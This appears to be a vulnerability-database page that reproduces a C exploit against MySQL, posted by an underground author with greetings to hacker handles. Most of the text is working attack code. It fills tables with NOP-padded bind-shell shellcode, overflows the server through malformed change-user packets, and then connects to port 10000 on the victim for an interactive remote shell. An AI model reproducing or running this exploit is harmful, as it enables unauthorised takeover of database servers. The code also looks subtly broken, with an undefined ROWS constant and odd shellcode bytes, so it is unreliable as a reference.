Vulners
Lucene search
MySql version 5.2 Change password length shell
==============================================
MySql version 5.2 Change password length shell
==============================================
I know I know it's been a while, I've been that much into xss and forget about the rest..
Mad respect
Inj3ct0r, please do not remove the comment that says Note: None is allowed to post this to exploit-db.com
/* MySql version 5.2 Change password length shell
*
* Usage: ./mysqlexploit -h localhost -u boof -p boof -t user -d mydb -g port
*
* Tested on: MySql 5.2 other versions may be variable
*
* Greetings to: Inj3ctOr ; Sid3^effects ; L0rd CrusAd3r ;indoushka ; The_Exploited ; Eidelweiss
*
* Note: None is allowed to post this to exploit-db.com
*
* Tested on: MySql 5.2 other versions may be variable
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <netdb.h>
#include <sys/time.h>
#include <resolv.h>
#include <mysql/mysql.h>
#include <signal.h>
#include <getopt.h>
/* shellcode 88 bytes*/
char *shellcode="\x31\x66\x6C\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80\x89\xc7\x52\x66\x68\x27\x01\x08\x00\x53\x89\xe1\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80\xb0\x66\xb3\x04\xcd\x80\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\x51\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80";
char db[50]="test"; // writable database
char victim[100]="localhost";
int offset=0;
/* Connect to port 10000 */
int do_connect(char *host)
{
struct hostent *he=gethostbyname(host);
struct sockaddr_in sa;
int outsocket,r;
struct timeval tv;
fd_set rfds;
char buffer[500];
memset (&sa, 0, sizeof (struct sockaddr_in));
memcpy (&sa.sin_addr.s_addr, he->h_addr_list[0], he->h_length);
sa.sin_family = AF_INET;
sa.sin_port=htons(10000);
outsocket=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if ((connect(outsocket,(struct sockaddr *)&sa,sizeof(struct sockaddr_in)))==-1)
return 0;
FD_ZERO (&rfds);
send(outsocket,"uname -a;\nid;\n",14,0);
printf("[+] Successful, Run your shell!: \n");
while (1) {
FD_SET (outsocket, &rfds);
FD_SET (0, &rfds);
tv.tv_sec = 30;
tv.tv_usec = 0;
select (outsocket + 1, &rfds, NULL, NULL, &tv);
if (FD_ISSET(outsocket, &rfds))
{
if ((r=recv(outsocket, buffer, sizeof(buffer), 0))==-1)
exit(2);
write(1,buffer,r);
}
if (FD_ISSET(0,&rfds))
{
r=read(0,buffer,sizeof(buffer));
send(outsocket,buffer,r,0);
}
}
return 1;
}
/* Print a silly joke! */
int nice_bar (int a,int max) {
int i;
int b=a*50/max;
printf("0 [");
for (i=0;i<=b;i++) printf(".");
for(;i<50;i++) printf(" ");
printf("] 100%\r");
fflush(stdout);
}
/* Try a query in mysql server */
int do_query(MYSQL *s, char *query)
{
if (mysql_query(s,query)) {
fprintf(stderr,"Query failed (%s)\n",mysql_error(s));
exit(1);
}
}
/* Boof the index cache */
int do_index(MYSQL *s) {
char query[1000];
MYSQL_RES *res;
printf("[+] Boofing index cache\n");
sprintf(query, "select * from %s.ow having u='junk';",db);
do_query(s,query);
if (!(res=mysql_store_result(s)))
{
printf("[-] Failed index cache boof\n");
}
mysql_free_result(res);
}
/* Collect mysql database */
int populate (MYSQL *s) {
char buf1[300];
char query[1000];
int i;
memset(buf1,0,sizeof(buf1));
memset(query,0,sizeof(query));
memset(buf1,'\x90',249-strlen(shellcode)-offset);
strcat(buf1,shellcode);
printf("[+] Creating temporal tables...\n");
sprintf(query,"use %s;",db);
do_query(s,query);
do_query(s,"create table oy(h varchar(250),a varchar(250));");
sprintf(query,"insert into oy(h,a) values (\"%s\",\"%s\");",
buf1,buf1);
do_query(s,query);
do_query(s,query);
do_query(s,query);
do_query(s,query);
do_query(s,"create table ow(u varchar(250),d varchar(250),index(u,d));");
printf("[+] Collecting database.. this will take a time..\n");
for(i=0;i<ROWS;i++) {
do_query(s,"INSERT INTO ow(u,d) select h,a from oy;");
nice_bar(i,ROWS);
}
printf("\n");
}
void *sig_hand (int a) {
if(do_connect(victim)) exit(1);
}
int main(int argc, char **argv)
{
MYSQL *sock,mysql;
char abuf[10000];
char *hashpass,pass[50]="",user[50]="",ouser[50]="root";
int i,port=3306,opt,pop=1;
unsigned long long int stime=1977321;
printf("[+] MySql vuln lenght <5.x by \033[1;33SeeMe\033[0m\n");
memset (abuf,0,sizeof(abuf));
if (argc < 2)
{
fprintf(stderr,"usage : %s -h <host> -u <user> -p <pass>"
" -t <other_user>\n\t[ -d writable_db] [ -g port ]"
"[ -o offset ] [ -s microsecs_sleep ] [ -n ]\n",argv[0]);
exit(1);
}
while((opt=getopt(argc,argv,"h:u:p:t:d:o:s:g:n"))!=EOF)
switch(opt) {
case 'h':
strncpy(victim,optarg,49);
break;
case 'u':
strncpy(user,optarg,49);
break;
case 'p':
strncpy(pass,optarg,49);
break;
case 't':
strncpy(ouser,optarg,49);
break;
case 'd':
strncpy(db,optarg,49);
break;
case 'g':
port=atoi(optarg);
break;
case 's':
stime=atol(optarg);
break;
case 'o':
offset=atoi(optarg);
if (offset>249-strlen(shellcode)) {
printf("[-] Maximun offset: %d\nAborting...\n",
249-strlen(shellcode));
exit(-1);
}
break;
case 'n':
pop=0;
break;
}
printf("[+] Do something with Params: \n");
printf("[+] Host: %s Port: %d User: %s Pass: %s\n",victim,port,user,pass);
printf("[+] Target_User: %s Writable_Database: %s\n",ouser,db);
printf("[+] Offset: %d Collect: %s Sleep: %llu\n\n",offset,
pop?"yes":"no",stime);
signal(SIGALRM,sig_hand);
printf("[+] Conecting...\n");
mysql_init(&mysql);
if (!(sock = mysql_real_connect(&mysql,victim,user,pass,
NULL,port,NULL,0)))
{
fprintf(stderr,"[-] Couldn't connect!\n%s\n",mysql_error(&mysql));
exit(1);
}
printf("[+] Connected: Version %s\n",mysql_get_server_info(sock));
printf("[+] Starting attack.. Rebuilding the base..\n");
strcpy(abuf,ouser);
hashpass=abuf+strlen(abuf)+1;
strcpy(hashpass,"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX");
if (pop)
populate(sock);
do {
do_index(sock);
net_clear(&sock->net);
if (net_write_command(&sock->net,COM_CHANGE_USER,
abuf,strlen(abuf)+strlen(hashpass)+2))
{
printf("[-] Can't send command to server.\n");
}
alarm(5);
if (my_net_read(&sock->net)==packet_error)
{
alarm(0);
printf("[+] Packet error..;)\n");
usleep(stime);
mysql_init(&mysql);
if (!(sock=mysql_real_connect(&mysql,victim,user,pass,
NULL,port,NULL,0)))
{
printf("[-] Something is wrong!?\n");
exit(1);
}
} else {
printf("[-] Attack failed!\n");
}
alarm(0);
} while(1);
mysql_close(sock);
}
# 0day.today [2018-01-01] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Jan 2010 00:00Current
6.8Medium risk
Vulners AI Score6.8